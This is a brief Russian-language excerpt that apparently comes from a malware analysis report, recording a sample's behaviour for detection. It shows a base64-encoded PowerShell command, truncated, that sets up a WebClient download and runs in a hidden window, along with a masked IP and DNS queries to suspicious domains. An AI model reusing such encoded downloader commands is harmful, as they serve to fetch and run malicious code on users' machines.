Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADQAMgBfADIAXwA1AD0AKAAnAGIAJwArACcAOQBfADkAMQAxACcAKQA7ACQASAA4ADMAXwAxAF8AXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB1ADUAMwBfADYAXwAwAF8APQAoACcAaAB0AH...
- '54.##5.153.237':80
- DNS ASK mo#####ngdothisonla.com
- DNS ASK ga######orrepairparamus.com
- DNS ASK pe##onit.ru
- DNS ASK ba###tdancer.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADQAMgBfADIAXwA1AD0AKAAnAGIAJwArACcAOQBfADkAMQAxACcAKQA7ACQASAA4ADMAXwAxAF8AXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB1ADUAMwBfADYAXwAwAF8APQAoACcAaAB0AH...' (со скрытым окном)